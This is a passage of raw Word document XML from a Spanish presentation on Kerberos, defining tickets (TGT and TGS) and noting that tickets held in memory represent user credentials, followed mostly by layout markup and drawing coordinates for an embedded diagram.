          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Un ticket es una forma de token de autenticación y autorización y se puede clasificar de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2CD5D7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="83"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05146E3A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2485"/>
        </w:tabs>
        <w:spacing w:line="484" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ticket de concesión de tickets (</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TGT</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>) para autenticación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD567BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2485"/>
        </w:tabs>
        <w:spacing w:line="484" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servicio de Concesión de Tickets (</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TGS)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> para Autorización</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F967C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1763"/>
          <w:tab w:val="left" w:pos="1765"/>
        </w:tabs>
        <w:spacing w:before="479" w:line="235" w:lineRule="auto"/>
        <w:ind w:right="1718"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los tickets (TGT y TGS) se almacenan en la memoria y se pueden extraer con fines abusivos, ya que estos tickets representan credenciales de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0ECDB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1873"/>
        </w:tabs>
        <w:spacing w:before="571"/>
        <w:ind w:left="1873" w:hanging="559"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El TGS se puede utilizar para acceder a un servicio específico de un servidor en el dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F643C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="440" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339273B8"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47840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BCDC4F6" wp14:editId="4009C5D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1754124</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>18283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9269095" cy="651383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9095" cy="6513830"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9269095" cy="6513830"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="162" name="Image 162"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8683750" cy="6513608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="163" name="Graphic 163"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="874508" y="1565024"/>
                            <a:ext cx="4832985" cy="2858135"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="4832985" h="2858135">
                                <a:moveTo>
                                  <a:pt x="3191522" y="673735"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3184525" y="670687"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3113417" y="639699"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115068" y="670687"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115106" y="671360"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2322080" y="717931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2112149" y="733933"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1907171" y="752221"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1806714" y="762254"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1610880" y="784606"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1515503" y="796925"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1422158" y="810387"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1330972" y="824484"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1241818" y="839851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1155204" y="855980"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1070876" y="873506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="989088" y="891921"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="910094" y="911860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="833894" y="932942"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="760488" y="955294"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="690245" y="979170"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="623074" y="1004316"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="559320" y="1031240"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="498868" y="1059561"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="442099" y="1089533"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="388759" y="1121156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="339356" y="1154684"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="293763" y="1189863"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="251980" y="1226947"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213880" y="1265555"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="179463" y="1305814"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148348" y="1347724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="120662" y="1391031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="96151" y="1435989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74815" y="1482090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56400" y="1529588"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="40779" y="1578483"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27825" y="1628394"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17665" y="1679575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9918" y="1731899"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4457" y="1785112"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1155" y="1839341"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1894459"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="889" y="1949831"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3530" y="2006612"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7772" y="2063407"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13982" y="2123186"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30238" y="2241677"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="51320" y="2362327"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76466" y="2484628"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="104533" y="2608326"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="134505" y="2732786"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165493" y="2857627"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="177812" y="2854579"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="146824" y="2729738"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="116852" y="2605405"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="88912" y="2481961"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63817" y="2360079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63842" y="2359774"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42811" y="2239772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26568" y="2121789"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26492" y="2121293"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20701" y="2064893"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20599" y="2063877"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20548" y="2063407"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16319" y="2007374"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16268" y="2006612"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13614" y="1950466"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13589" y="1949831"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12712" y="1894713"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13843" y="1840115"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16992" y="1786597"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="22402" y="1734159"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29895" y="1683054"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30073" y="1682127"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30111" y="1681632"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30581" y="1679575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39916" y="1632800"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52870" y="1582166"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68338" y="1534033"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="86385" y="1487335"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107340" y="1441869"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131699" y="1397381"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="158762" y="1355090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189026" y="1314196"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222605" y="1274876"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222999" y="1274533"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223075" y="1274330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223393" y="1273962"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="231762" y="1265555"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="260616" y="1236218"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="301510" y="1199972"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="346964" y="1164844"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395465" y="1131989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="448233" y="1100582"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="504456" y="1070991"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="564108" y="1043000"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="627773" y="1016254"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="694448" y="991108"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="763041" y="967879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="764235" y="967524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="837323" y="945134"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="913269" y="924052"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="988009" y="905281"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="991984" y="904379"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1073543" y="885825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1157617" y="868426"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1244104" y="852297"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1332877" y="837057"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1424063" y="822833"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1517154" y="809625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1612404" y="797179"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1807984" y="774827"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1908314" y="764794"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2113165" y="746633"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2536710" y="716407"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2753372" y="703592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3115780" y="684060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3117481" y="715772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3191522" y="673735"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4832985" h="2858135">
                                <a:moveTo>
                                  <a:pt x="4831156" y="47802"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4830826" y="46736"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4830711" y="46355"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4828667" y="41910"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4828552" y="41656"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4827067" y="39497"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4825504" y="37211"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4822787" y="34544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4818519" y="30353"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4818265" y="30111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4812360" y="25908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4809502" y="23876"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4800892" y="19519"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4799215" y="18669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4787836" y="14097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4787976" y="14097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4782972" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4743970" y="4445"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4688979" y="254"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4675175" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4646561" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4599825" y="1397"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4549406" y="4445"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4467491" y="11684"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4378337" y="21717"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4318012" y="29337"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4059440" y="65659"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4061218" y="78232"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4163657" y="63436"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4193032" y="59321"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4319536" y="41910"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4440186" y="27432"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4523879" y="19177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4575822" y="15367"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4624082" y="13081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4646688" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4674921" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4695241" y="13081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4691240" y="13081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4713452" y="14097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4710950" y="14097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4727448" y="15367"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4726724" y="15367"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4743221" y="17145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4742954" y="17145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4742446" y="17145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4744161" y="17348"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4758296" y="19685"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4803140" y="34988"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4812169" y="41910"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4815344" y="44958"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4816653" y="46736"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4817249" y="47371"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4817440" y="47802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4817884" y="48387"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4817516" y="47802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4831156" y="47802"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4832985" h="2858135">
                                <a:moveTo>
                                  <a:pt x="4831956" y="50419"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4831334" y="48387"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4817884" y="48387"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4817719" y="48387"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4818659" y="50419"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4831956" y="50419"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4832985" h="2858135">
                                <a:moveTo>
                                  <a:pt x="4832870" y="62230"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4832807" y="56134"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4832235" y="51308"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4819078" y="51308"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4818913" y="51308"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4819662" y="53467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4820043" y="56134"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4820145" y="62230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4819764" y="65151"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4819701" y="65659"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4819650" y="66141"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4818951" y="68707"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4817249" y="75184"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4796904" y="113169"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4763147" y="156210"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4733455" y="188950"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4691189" y="231533"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4626114" y="292862"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4587760" y="327660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4496828" y="409067"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4465332" y="437642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4462818" y="440105"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4440440" y="417449"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4413135" y="498221"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4494034" y="471678"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4480598" y="458089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4471733" y="449122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4473968" y="446913"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4505337" y="418465"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4596269" y="337185"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4634623" y="302260"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4672596" y="266954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4709045" y="231775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4742827" y="197612"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4772672" y="164592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4797818" y="133731"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4824107" y="92075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4832426" y="66141"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4832540" y="65151"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4832870" y="6223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68" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1441449" y="141863"/>
                            <a:ext cx="6163436" cy="338074"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="165" name="Image 165"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId69" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="7697215" y="302899"/>
                            <a:ext cx="254000" cy="67818"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="166" name="Image 166"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId70" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="8042909" y="158627"/>
                            <a:ext cx="1226185" cy="321310"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
